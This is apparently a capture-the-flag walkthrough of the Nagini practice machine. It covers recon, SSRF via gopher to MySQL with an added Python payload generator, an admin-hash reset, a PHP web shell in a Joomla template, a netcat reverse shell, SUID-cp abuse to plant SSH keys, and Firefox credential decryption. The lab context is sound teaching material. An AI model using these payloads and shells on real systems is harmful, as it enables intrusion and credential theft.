First, arp-scan is used to sweep the local network and find the target's IP address.
ARP scan
192.168.2.124 08:00:27:4c:e7:08 PCS Systemtechnik GmbH
Next, /etc/hosts is edited to map the hostname hp_nagini.vln to that IP address.
/etc/hosts
192.168.2.124 hp_nagini.vln
Nmap is used to scan the target for open ports and services. -Pn skips host discovery in case ICMP is blocked. The output is then filtered so that only the open ports are shown (the versions match the detailed scan and the Nikto output below).
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
Nmap is run again to obtain more detailed information.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-19 13:50 CET
Nmap scan report for hp_nagini.vln (192.168.2.124)
Host is up (0.00014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 48:df:48:37:25:94:c4:74:6b:2c:62:73:bf:b4:9f:a9 (RSA)
| 256 1e:34:18:17:5e:17:95:8f:70:2f:80:a6:d5:b4:17:3e (ECDSA)
|_ 256 3e:79:5f:55:55:3b:12:75:96:b4:3e:e3:83:7a:54:94 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:4C:E7:08 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.14 ms hp_nagini.vln (192.168.2.124)
Nikto is used to scan the web server for common misconfigurations and known issues.
- Nikto v2.5.0
+ Target IP: 192.168.2.124
+ Target Hostname: 192.168.2.124
+ Target Port: 80
+ Start Time: 2024-11-19 13:50:58 (GMT1)
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present.
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 61, size: 5befef8ab2764, mtime: gzip.
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2024-11-19 13:51:36 (GMT1) (38 seconds)
+ 1 host(s) tested
Gobuster is used to discover further directories and files.
http://192.168.2.124/index.html (Status: 200) [Size: 97]
http://192.168.2.124/note.txt (Status: 200) [Size: 234]
http://192.168.2.124/joomla (Status: 301) [Size: 315] [--> http://192.168.2.124/joomla/]
The contents of note.txt are displayed.
----------------------------------------------------------------------------------------------------
http://192.168.2.124/note.txt
Hello developers!!
I will be using our new HTTP3 Server at https://quic.nagini.hogwarts for further communications.
All developers are requested to visit the server regularly for checking latest announcements.
Regards,
site_amdin
----------------------------------------------------------------------------------------------------
JoomScan is used to analyse the Joomla installation.
____ _____ _____ __ __ ___ ___ __ _ _
(_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
(1337.today)
--=[OWASP JoomScan
+++[Version : 0.0.7
+++[Update Date : [2018/09/23]
+++[Authors : Mohammad Reza Espargham , Ali Razmjoo
--=[Code name : Self Challenge
@OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP
Processing http://192.168.2.124/joomla/ ...
[+] FireWall Detector
[++] Firewall not detected
[+] Detecting Joomla Version
[++] Joomla 3.9.25
[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable
[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.2.124/joomla/administrator/components
http://192.168.2.124/joomla/administrator/modules
http://192.168.2.124/joomla/administrator/templates
http://192.168.2.124/joomla/tmp
http://192.168.2.124/joomla/images/banners
[+] Checking apache info/status files
[++] Readable info/status files are not found
[+] admin finder
[++] Admin page : http://192.168.2.124/joomla/administrator/
[+] Checking robots.txt existing
[++] robots.txt is found
path : http://192.168.2.124/joomla/robots.txt
Interesting path found from robots.txt
http://192.168.2.124/joomla/joomla/administrator/
http://192.168.2.124/joomla/administrator/
http://192.168.2.124/joomla/bin/
http://192.168.2.124/joomla/cache/
http://192.168.2.124/joomla/cli/
http://192.168.2.124/joomla/components/
http://192.168.2.124/joomla/includes/
http://192.168.2.124/joomla/installation/
http://192.168.2.124/joomla/language/
http://192.168.2.124/joomla/layouts/
http://192.168.2.124/joomla/libraries/
http://192.168.2.124/joomla/logs/
http://192.168.2.124/joomla/modules/
http://192.168.2.124/joomla/plugins/
http://192.168.2.124/joomla/tmp/
[+] Finding common backup files name
[++] Backup files are not found
[+] Finding common log files name
[++] error log is not found
[+] Checking sensitive config.php.x file
[++] Readable config file is found
----------------------------------------------------------------------------------------------------
config file path : http://192.168.2.124/joomla/configuration.php.bak
----------------------------------------------------------------------------------------------------
Your Report : reports/192.168.2.124/
The backup of the configuration file is downloaded; the .bak extension means Apache serves it as a plain file instead of executing it as PHP.
--2024-11-19 14:03:27-- http://192.168.2.124/joomla/configuration.php.bak
Connecting to 192.168.2.124:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1978 (1.9K) [application/x-trash]
Saving to: 'configuration.php.bak'
configuration.php.bak 100%[=>] 1.93K --.-KB/s in 0s
2024-11-19 14:03:27 (365 MB/s) - 'configuration.php.bak' saved [1978/1978]
The contents of the configuration file are displayed. Two details matter later: the database user goblin has an empty password ($password = ''), and the mail address site_admin@nagini.hogwarts identifies the Joomla administrator account.
class JConfig {
public $offline = '0';
public $offline_message = 'This site is down for maintenance. Please check back again soon.';
public $display_offline_message = '1';
public $offline_image = '';
public $sitename = 'Joomla CMS';
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'goblin';
public $password = '';
public $db = 'joomla';
public $dbprefix = 'joomla_';
public $live_site = '';
public $secret = 'ILhwP6HTYKcN7qMh';
public $gzip = '0';
public $error_reporting = 'default';
public $mailer = 'mail';
public $mailfrom = 'site_admin@nagini.hogwarts';
public $fromname = 'Joomla CMS';
public $sendmail = '/usr/sbin/sendmail';
public $log_path = '/var/www/html/joomla/administrator/logs';
public $tmp_path = '/var/www/html/joomla/tmp';
public $lifetime = '15';
public $session_handler = 'database';
public $shared_session = '0';
Gobuster is run again, this time against the hostname nagini.hogwarts taken from the note and the mailfrom address in the configuration; the virtual host serves a different page.
http://nagini.hogwarts/index.html (Status: 200) [Size: 97]
http://nagini.hogwarts/internalResourceFeTcher.php (Status: 200) [Size: 362]
The contents of internalResourceFeTcher.php are displayed.
----------------------------------------------------------------------------------------------------
http://nagini.hogwarts/internalResourceFeTcher.php
Resource Fetching Page
Welcome to Internal Network Resource Fetching Page
form action="/internalResourceFeTcher.php" method="GET"
A test file (ben.txt) is created on the attacker machine.
An HTTP server is started there to serve the file.
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
The file is fetched through internalResourceFeTcher.php by passing its URL in the url parameter.
----------------------------------------------------------------------------------------------------
http://nagini.hogwarts/internalResourceFeTcher.php?url=http://192.168.2.199/ben.txt
Welcome to Internal Network Resource Fetching Page
hi man
----------------------------------------------------------------------------------------------------
SSRF confirmed: the server fetched a URL of the attacker's choosing on its own behalf (this is server-side request forgery, not LFI).
Next, an attempt is made to read /etc/passwd through the same parameter.
root:x:0:0:root:/root:/bin/bash
snape:x:1000:1000:Snape,,,:/home/snape:/bin/bash
hermoine:x:1002:1002:/home/hermoine:/bin/bash
Gopherus is used to generate a gopher:// payload that speaks the MySQL wire protocol to the database listening on localhost. The tool only works for a database user without a password, because the attacker never sees the server's challenge and therefore cannot compute an authentication response.
________ .__
/ _____/ ____ ______ | |__ ___________ __ __ ______
/ \ ___ / _ \____ \| | \_/ __ \_ __ \ | \/ ___/
\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \
\______ /\____/| __/|___| /\___ >__| |____//____ >
\/ |__| \/ \/ \/
author: $_SpyD3r_$
For making it work username should not be password protected!!!
Give MySQL username: goblin
Give query to execute: show databases;
Your gopher link is ready to do SSRF :
gopher://127.0.0.1:3306/_%a5%00%00%01%85%a6%ff%01%00%00%00%01....
--Made-by-SpyD3r--
The generated gopher link is passed to the fetcher to reach the MySQL service on 127.0.0.1.
----------------------------------------------------------------------------------------------------
http://nagini.hogwarts/internalResourceFeTcher.php?url=gopher://127.0.0.1:3306/_%a5%00%00%01%8...
Welcome to Internal Network Resource Fetching Page
Warning: curl_setopt(): Curl option contains invalid characters (\0) in /var/www/html/internalResourceFeTcher.php on line 37
----------------------------------------------------------------------------------------------------
gopher://192.168.2.124:3306/_%a5%00%00%01%85%a6%ff%01%...
The first attempt fails because PHP has already URL-decoded the url parameter once: every %00 in the Gopherus payload reaches curl_setopt() as a raw NUL byte, which curl refuses. Encoding the gopher URL a second time (so that %00 becomes %2500, as in the table-listing request further below) gets the bytes through to curl, which decodes them again before writing them to the socket. Even then the fetch had to be retried several times before the output appeared.
gopher://127.0.0.1:3306/_%a5%00%00%01%85%a6%ff%01%00%0...
Welcome to Internal Network Resource Fetching Page
c 5.5.5-10.3.27-MariaDB-0+deb10u18^rB1kLx:U~:C"!{l+1S...joomla
The database tables are listed next.
________ .__
/ _____/ ____ ______ | |__ ___________ __ __ ______
/ \ ___ / _ \____ \| | \_/ __ \_ __ \ | \/ ___/
\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \
\______ /\____/| __/|___| /\___ >__| |____//____ >
\/ |__| \/ \/ \/
author: $_SpyD3r_$
For making it work username should not be password protected!!!
Give MySQL username: goblin
Give query to execute: use joomla;show tables;
Your gopher link is ready to do SSRF :
gopher://127.0.0.1:3306/_%a5%00%00%01%85%a6%ff%01%00%00%00%01%21%00%...
--Made-by-SpyD3r--
The tables are read.
----------------------------------------------------------------------------------------------------
http://nagini.hogwarts/internalResourceFeTcher.php?url=gopher%3A%2F%2F127.0.0.1%3A3306%2F_%25a5%2500%2500%2501%2585%25a6%25ff...
Welcome to Internal Network Resource Fetching Page
c 5.5.5-10.3.27-MariaDB-0+deb10u1Cr8a`...
The Joomla administrator's password hash is overwritten. 21232f297a57a5a743894a0e4a801fc3 is the unsalted MD5 of the string admin; Joomla 3 still accepts this legacy hash format on login and upgrades it to bcrypt on the next successful login. Two statements go into one query, which works because the handshake Gopherus builds enables CLIENT_MULTI_STATEMENTS.
________ .__
/ _____/ ____ ______ | |__ ___________ __ __ ______
/ \ ___ / _ \____ \| | \_/ __ \_ __ \ | \/ ___/
\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \
\______ /\____/| __/|___| /\___ >__| |____//____ >
\/ |__| \/ \/ \/
author: $_SpyD3r_$
For making it work username should not be password protected!!!
Give MySQL username: goblin
Give query to execute: USE joomla; UPDATE joomla_users SET password='21232f297a57a5a743894a0e4a801fc3' WHERE email='site_admin@nagini.hogwarts';
Your gopher link is ready to do SSRF :
gopher://127.0.0.1:3306/_%a5%00%00%01%85%a6%ff%01%00%00%00%01%2...
--Made-by-SpyD3r--
MySQL password injection succeeded ("Rows matched: 1" confirms the email matched exactly one user).
----------------------------------------------------------------------------------------------------
Welcome to Internal Network Resource Fetching Page
c 5.5.5-10.3.27-MariaDB-0+deb10u1ynazdeN7f...joomla0(Rows matched: 1 Changed: 0 Warnings: 0
The new credentials are tested on the site's front-end login.
----------------------------------------------------------------------------------------------------
http://nagini.hogwarts/joomla/index.php/component/users/?view=login&Itemid=101
User : PW
site_admin : admin
----------------------------------------------------------------------------------------------------
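The Gopherus payload, the double-encoding workaround and the MD5 password reset above, rebuilt as an added Python example (this is not code from the original page or from Gopherus). It constructs the MySQL Handshake Response and COM_QUERY packets by hand, which makes it clear why the database user must have an empty password, and wraps the result for the vulnerable fetcher. Target names (nagini.hogwarts, goblin, site_admin@nagini.hogwarts, the joomla_ table prefix) come from the walkthrough; the capability flag set and the mysql_native_password plugin name are my choices and are assumptions.

```python
import hashlib
import struct
from urllib.parse import quote

# MySQL client capability flags (values from the MySQL client/server protocol)
CLIENT_LONG_PASSWORD     = 0x00000001
CLIENT_LONG_FLAG         = 0x00000004
CLIENT_PROTOCOL_41       = 0x00000200
CLIENT_TRANSACTIONS      = 0x00002000
CLIENT_SECURE_CONNECTION = 0x00008000
CLIENT_MULTI_STATEMENTS  = 0x00010000   # needed for "USE joomla; UPDATE ..." in one query
CLIENT_MULTI_RESULTS     = 0x00020000
CLIENT_PLUGIN_AUTH       = 0x00080000

COM_QUIT  = 0x01
COM_QUERY = 0x03


def packet(payload: bytes, seq: int) -> bytes:
    """Prefix a payload with the MySQL packet header: 3-byte LE length + 1-byte sequence id."""
    return struct.pack("<I", len(payload))[:3] + bytes([seq]) + payload


def handshake_response(user: str) -> bytes:
    """Handshake Response 41 for a user with an EMPTY password.

    The auth response is left empty because an SSRF attacker never sees the
    server's 20-byte scramble, so no challenge/response can be computed; this
    is why the DB user must have no password for the gopher trick to work.
    The flag set below is an assumption (any set including the ones listed works)."""
    caps = (CLIENT_LONG_PASSWORD | CLIENT_LONG_FLAG | CLIENT_PROTOCOL_41
            | CLIENT_TRANSACTIONS | CLIENT_SECURE_CONNECTION
            | CLIENT_MULTI_STATEMENTS | CLIENT_MULTI_RESULTS | CLIENT_PLUGIN_AUTH)
    body = struct.pack("<IIB", caps, 0x01000000, 33)   # caps, max packet size, utf8_general_ci
    body += b"\x00" * 23                                # reserved, must be zero
    body += user.encode() + b"\x00"                     # NUL-terminated username
    body += b"\x00"                                     # auth-response length 0 -> empty password
    body += b"mysql_native_password\x00"                # auth plugin name (CLIENT_PLUGIN_AUTH)
    return packet(body, 1)                              # server greeting is seq 0, our reply is seq 1


def mysql_gopher_url(user: str, query: str, host: str = "127.0.0.1", port: int = 3306) -> str:
    """Build the gopher:// URL: log in as `user`, run `query`, then COM_QUIT.

    curl sends everything after "/_" to the socket verbatim once URL-decoded
    (the "_" is the gopher item type and is stripped)."""
    raw = (handshake_response(user)
           + packet(bytes([COM_QUERY]) + query.encode(), 0)   # each command restarts at seq 0
           + packet(bytes([COM_QUIT]), 0))
    return f"gopher://{host}:{port}/_" + quote(raw, safe="")


def fetcher_url(fetcher: str, inner_url: str) -> str:
    """Wrap the gopher URL for the vulnerable fetcher.

    PHP URL-decodes $_GET['url'] once; a single-encoded %00 therefore reaches
    curl_setopt() as a raw NUL byte and is rejected ("Curl option contains
    invalid characters"). Encoding a second time turns %00 into %2500, so PHP
    hands curl a literal "%00" and curl decodes it on the wire."""
    return fetcher + "?url=" + quote(inner_url, safe="")


def joomla_legacy_reset_query(email: str, new_password: str, prefix: str = "joomla_") -> str:
    """UPDATE that sets a plain MD5 hash; Joomla 3 still accepts this legacy format."""
    digest = hashlib.md5(new_password.encode()).hexdigest()
    return (f"USE joomla; UPDATE {prefix}users SET password='{digest}' "
            f"WHERE email='{email}';")


if __name__ == "__main__":
    # Values taken from the walkthrough above; the fetcher path is the one found by gobuster.
    fetcher = "http://nagini.hogwarts/internalResourceFeTcher.php"
    sql = joomla_legacy_reset_query("site_admin@nagini.hogwarts", "admin")
    print(fetcher_url(fetcher, mysql_gopher_url("goblin", sql)))
```

Paste the printed URL into the browser. The response body starts with the server greeting packet (the "5.5.5-10.3.27-MariaDB" string seen above), followed by the OK packet for the UPDATE with its "Rows matched" text.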
The administrator back-end is accessed with the same credentials.
http://nagini.hogwarts/joomla/administrator/index.php
login successful
The template file index.php is edited through the back-end template editor to plant a PHP web shell.
http://nagini.hogwarts/joomla/administrator/index.php?option=com_templates&view=templates
Navbar / Extensions / Templates / Templates
Protostar Details and Files
--> index.php: the following line is inserted directly after the opening <?php tag, ahead of the file's doc comment:
echo system($_GET['cmd']);
/**
 * @package Joomla.Site
 * @subpackage Templates.protostar
 *
Save <<--
----------------------------------------------------------------------------------------------------
Message
File saved.
The template preview is opened; the notices below show that the inserted line is executed (no cmd parameter has been supplied yet).
Template Preview
Notice: Undefined index: cmd in /var/www/html/joomla/templates/protostar/index.php on line 2
Warning: system(): Cannot execute a blank command in /var/www/html/joomla/templates/protostar/index.php on line 2
Commands are now executed through the web shell and a reverse shell is established. The output of id appears twice because system() already prints the command output and echo then prints its return value (the last output line) again.
http://nagini.hogwarts/joomla/templates/protostar/index.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data)
------------------------------------------------------------------------------------
Payload: http://nagini.hogwarts/joomla/templates/protostar/index.php?cmd=%2Fbin%2F
------------------------------------------------------------------------------------
┌──(pwn)─(root㉿CCat)-[~]
└─# nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.2.199] from (UNKNOWN) [192.168.2.124] 43986
bash: cannot set terminal process group (465): Inappropriate ioctl for device
bash: no job control in this shell
find / -type f -perm -4000 -ls 2>/dev/null is used to list SUID binaries. /home/hermoine/bin/su_cp stands out: it is setuid to hermoine rather than root, so any user able to run it performs the copy with hermoine's effective UID.
www-data@Nagini:/var/www/html/joomla/templates/protostar$ find / -type f -perm -4000 -ls 2>/dev/null
3436 44 -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
52 56 -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
3908 52 -rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount
3583 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
56 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
53 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
55 84 -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
3910 36 -rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount
12806 428 -rwsr-xr-x 1 root root 436552 Feb 1 2020 /usr/lib/openssh/ssh-keysign
9936 52 -rwsr-xr-- 1 root messagebus 51184 Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
135462 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
268870 144 -rwsr-xr-x 1 hermoine hermoine 146880 Apr 4 2021 /home/hermoine/bin/su_cp
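An added triage helper for SUID listings like the one above (example code, not from the original page): it parses `find -ls` output and flags entries that are setuid to a non-root user, live outside the system binary directories, or are group/world writable. The sample lines are constructed from the listing above plus one made-up writable binary (/opt/backup_helper, hypothetical) to exercise the third rule.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample in the format of `find / -type f -perm -4000 -ls`;
# the last line is hypothetical and only exists to trigger the writable rule.
SAMPLE_FIND_LS = """\
3583 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
56 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
9936 52 -rwsr-xr-- 1 root messagebus 51184 Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
268870 144 -rwsr-xr-x 1 hermoine hermoine 146880 Apr 4 2021 /home/hermoine/bin/su_cp
4242 40 -rwsrwxrwx 1 root root 40960 Nov 1 2024 /opt/backup_helper
"""

# inode blocks mode links owner group size month day year-or-time path
LINE_RE = re.compile(
    r"^\s*\d+\s+\d+\s+(?P<mode>[-a-zA-Z]{10})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\d+\s+\S+\s+(?P<path>/\S+)$"
)

# Directories where distribution-managed SUID binaries normally live.
SYSTEM_PREFIXES = ("/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/", "/bin/", "/sbin/")


def parse_find_ls(text: str) -> List[Dict[str, str]]:
    """Turn `find -ls` lines into dicts with mode, owner, group and path."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def triage_suid(entries: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (path, reasons) for SUID binaries that deserve a closer look."""
    findings = []
    for e in entries:
        reasons = []
        if e["owner"] != "root":
            # setuid to an ordinary user: anyone who can run it acts as that user
            reasons.append(f"setuid to non-root user {e['owner']}")
        if not e["path"].startswith(SYSTEM_PREFIXES):
            reasons.append("outside system binary directories")
        # mode string: type + rwx(user) + rwx(group) + rwx(other); index 5 / 8 are the w bits
        if e["mode"][5] == "w" or e["mode"][8] == "w":
            reasons.append("group/world writable")
        if reasons:
            findings.append((e["path"], "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    for path, why in triage_suid(parse_find_ls(SAMPLE_FIND_LS)):
        print(f"{path}: {why}")
```

On a real host, pipe the output of the find command into the parser instead of the constructed sample; the distribution defaults (su, passwd, the dbus helper) pass all three rules, while su_cp is reported for being owned by hermoine and living under /home.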
snape's home directory is searched for credentials; a hidden file holds a Base64-encoded password.
www-data@Nagini:/home/snape$ cat .creds.txt
TG92ZUBsaWxseQ
www-data@Nagini:/home/snape$ echo TG92ZUBsaWxseQ | base64 -d
Love@lilly
An SSH connection as snape is established with the decoded password.
┌──(root㉿CCat)-[~]
└─# ssh snape@192.168.2.124
snape@192.168.2.124's password:
Linux Nagini 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 4 16:38:35 2021 from 192.168.1.53
snape@Nagini:/home/hermoine$
The contents of /home/hermoine are listed.
snape@Nagini:/home/hermoine$ ls -a
. .. bin .gnupg horcrux2.txt .mozilla .ssh
The help output of ./su_cp shows that it is a copy of GNU cp.
snape@Nagini:/home/hermoine/bin$ ./su_cp --help
Usage: ./su_cp [OPTION]... [-T] SOURCE DEST
or: ./su_cp [OPTION]... SOURCE... DIRECTORY
or: ./su_cp [OPTION]... -t DIRECTORY SOURCE...
Copy SOURCE to DEST, or multiple SOURCE(s) to DIRECTORY.
Mandatory arguments to long options are mandatory for short options too.
-a, --archive same as -dR --preserve=all
--attributes-only don't copy the file data, just the attributes
--backup[=CONTROL] make a backup of each existing destination file
-b like --backup but does not accept an argument
--copy-contents copy contents of special files when recursive
-d same as --no-dereference --preserve=links
-f, --force if an existing destination file cannot be
opened, remove it and try again (this option
is ignored when the -n option is also used)
-i, --interactive prompt before overwrite (overrides a previous -n
option)
-H follow command-line symbolic links in SOURCE
-l, --link hard link files instead of copying
-L, --dereference always follow symbolic links in SOURCE
-n, --no-clobber do not overwrite an existing file (overrides
a previous -i option)
-P, --no-dereference never follow symbolic links in SOURCE
-p same as --preserve=mode,ownership,timestamps
--preserve[=ATTR_LIST] preserve the specified attributes (default:
mode,ownership,timestamps), if possible
additional attributes: context, links, xattr,
all
--no-preserve=ATTR_LIST don't preserve the specified attributes
--parents use full source file name under DIRECTORY
-R, -r, --recursive copy directories recursively
--reflink[=WHEN] control clone/CoW copies. See below
--remove-destination remove each existing destination file before
attempting to open it (contrast with --force)
--sparse=WHEN control creation of sparse files. See below
--strip-trailing-slashes remove any trailing slashes from each SOURCE
argument
-s, --symbolic-link make symbolic links instead of copying
-S, --suffix=SUFFIX override the usual backup suffix
-t, --target-directory=DIRECTORY copy all SOURCE arguments into DIRECTORY
horcrux2.txt is copied into the current directory. Because of the SUID bit the copy runs as hermoine, which is why the file can be read at all.
snape@Nagini:/home/hermoine/bin$ ./su_cp --copy-contents ../horcrux2.txt .
snape@Nagini:/home/hermoine/bin$
horcrux2.txt is read.
snape@Nagini:/home/hermoine/bin$ cat horcrux2.txt
horcrux_{NDogSGVsZ2EgSHVmZmxlcHVmZidzIEN1cCBkZXN0cm95ZWQgYnkgSGVybWlvbmU=}
The Base64 part is decoded.
snape@Nagini:/home/hermoine/bin$ echo NDogSGVsZ2EgSHVmZmxlcHVmZidzIEN1cCBkZXN0cm95ZWQgYnkgSGVybWlvbmU= | base64 -d
4: Helga Hufflepuff's Cup destroyed by Hermione
An HTTP server is started on the attacker machine to serve an authorized_keys file containing the attacker's public key.
┌──(root㉿CCat)-[~]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
authorized_keys is fetched into /tmp on the target.
snape@Nagini:/home/hermoine/bin$ cd /tmp/
snape@Nagini:/tmp$ wget 192.168.2.199/authorized_keys
--2024-11-19 20:14:24-- http://192.168.2.199/authorized_keys
Connecting to 192.168.2.199:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 91 [application/octet-stream]
Saving to: ‘authorized_keys’
authorized_keys 100%[=====================================>] 91 --.-KB/s in 0s
2024-11-19 20:14:24 (37.2 MB/s) - ‘authorized_keys’ saved [91/91]
authorized_keys is copied into hermoine's .ssh directory with su_cp. The file is created by a process running with hermoine's effective UID, so it ends up owned by hermoine, which is what sshd requires.
snape@Nagini:/tmp$ cd -
/home/hermoine/bin
snape@Nagini:/home/hermoine/bin$ ./su_cp --copy-contents /tmp/authorized_keys ../.ssh
snape@Nagini:/home/hermoine/bin$
SSH key injection succeeded.
Login as hermoine with the attacker's private key works.
┌──(root㉿CCat)-[~]
└─# ssh hermoine@192.168.2.124
Enter passphrase for key '/root/.ssh/id_rsa':
Linux Nagini 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 4 16:43:01 2021 from 1
hermoine@Nagini$
The contents of /opt are listed.
hermoine@Nagini$ ls -la /opt/
total 14716
drwxr-xr-x 3 root root 4096 Apr 4 2021 .
drwxr-xr-x 18 root root 4096 Apr 4 2021 ..
-rw-r--r-- 1 root root 14018704 Mar 2 2021 Joomla.zip
drwxr-xr-x 16 ron ron 4096 Apr 3 2021 nginx-1.16.1
-rw-r--r-- 1 root root 1032630 Apr 3 2021 nginx-1.16.1.tar.gz
An HTTP server is started on the target on port 8000 so that files can be pulled back to the attacker machine.
hermoine@Nagini$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Joomla.zip is downloaded.
┌──(root㉿CCat)-[~]
└─# wget 192.168.2.124:8000/Joomla.zip
--2024-11-19 16:26:25-- http://192.168.2.124:8000/Joomla.zip
Connecting to 192.168.2.124:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 14018704 (13M) [application/zip]
Saving to: 'Joomla.zip'
Joomla.zip 100%[=====================================>] 13.37M --.-KB/s in 0.05s
2024-11-19 16:26:25 (248 MB/s) - 'Joomla.zip' saved [14018704/14018704]
Joomla.zip is unpacked.
┌──(root㉿CCat)-[~]
└─# unzip Joomla.zip
Archive: Joomla.zip
inflating: LICENSE.txt
inflating: README.txt
creating: administrator/
....
...
..
inflating: tmp/index.html
inflating: web.config.txt
horcrux1.txt is displayed.
hermoine@Nagini:/opt$ cat /var/www/html/horcrux1.txt
horcrux_{MzogU2x5dGhFcmlJ3MgTG9jS0VldCBkRXN0cm9ZZUQgYlkgUm9}
Base64 decoded
hermoine@Nagini:/opt$ echo MzogU2x5dGhFcmlJ3MgTG9jS0VldCBkRXN0cm9ZZUQgYlkgUm9|base64 -d
3: SlythEriN's LocKEet dEstroYeD bY RoN
firefox_decrypt is cloned on the attacker machine.
┌──(root㉿CCat)-[~/Hackingtools]
└─# git clone https://github.com/unode/firefox_decrypt
Cloning into 'firefox_decrypt'...
remote: Enumerating objects: 1382, done.
remote: Counting objects: 100% (500/500), done.
remote: Compressing objects: 100% (118/118), done.
remote: Total 1382 (delta 399), reused 460 (delta 377), pack-reused 882 (from 1)
Receiving objects: 100% (1382/1382), 481.61 KiB | 1.30 MiB/s, done.
Resolving deltas: 100% (873/873), done.
Privilege Escalation
The contents of hermoine's home directory are listed.
hermoine@Nagini:/opt$ cd ~
hermoine@Nagini$ ls -la
total 28
drwxr-xr-x 6 hermoine hermoine 4096 Apr 4 2021 .
drwxr-xr-x 4 root root 4096 Apr 4 2021 ..
drwxr-xr-x 2 hermoine hermoine 4096 Nov 19 20:08 bin
drwx------ 3 hermoine hermoine 4096 Apr 4 2021 .gnupg
-r--r----- 1 hermoine hermoine 75 Apr 4 2021 horcrux2.txt
drwx------ 5 hermoine hermoine 4096 Jun 1 2019 .mozilla
drwxr-xr-x 2 hermoine hermoine 4096 Nov 19 20:15 .ssh
The contents of the .mozilla directory are listed.
hermoine@Nagini/.mozilla$ ls -la
total 20
drwx------ 5 hermoine hermoine 4096 Jun 1 2019 .
drwxr-xr-x 6 hermoine hermoine 4096 Apr 4 2021 ..
drwx------ 2 hermoine hermoine 4096 Jun 1 2019 extensions
drwx------ 5 hermoine hermoine 4096 Jun 1 2019 firefox
drwx------ 2 hermoine hermoine 4096 Jun 1 2019 systemextensionsdev
Firefox credentials are extracted: the profile is pulled over the HTTP server running on the target (wget -r) and decrypted offline with firefox_decrypt. The stored login for http://nagini.hogwarts is for the user root.
┌──(root㉿CCat)-[~/jojo/192.168.2.124:8000]
└─# wget -r 192.168.2.124:8000/
┌──(root㉿CCat)-[~/Hackingtools/firefox_decrypt]
└─# python3 firefox_decrypt.py /root/jojo/192.168.2.124:8000
